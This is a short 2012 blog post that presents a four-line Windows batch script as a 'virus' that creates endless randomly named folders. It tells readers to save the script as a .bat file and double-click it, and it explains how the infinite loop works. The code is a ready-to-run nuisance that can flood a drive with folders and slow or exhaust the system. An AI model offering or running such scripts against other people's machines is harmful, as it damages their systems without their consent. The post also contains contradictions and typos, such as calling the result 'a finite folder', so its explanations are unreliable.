Search This Blog Here
Saturday, 17 November 2012
Create VIrus To Create Infinitive File Folder In A Drive
Do you like this story?
Copy this code to Notepad.
@echo off
:top
md %random%
goto top
@echo off makes it so
that it appears to be a blank screen but actually its making hundreds of
folder.
md %random% is command that creating folders with random
names.
goto top – return to label :top , infinite loop
Save the file with .bat extension(for eg: folderscreate.bat)
That’s all if you double click the file it will create a
finite folder wherever the batch file is.

This post was written by: Ajit Kumar
Ajit Kumar is a beginner blogger and wed designer. Follow him on Facebook
Subscribe to:
Post Comments (Atom)
IF YOU DON'T GOT WHAT YOU ARE FIND OR YOU OCCUR ANY PROBLEM THEN Click Here
0 Responses to “Create VIrus To Create Infinitive File Folder In A Drive”
Post a Comment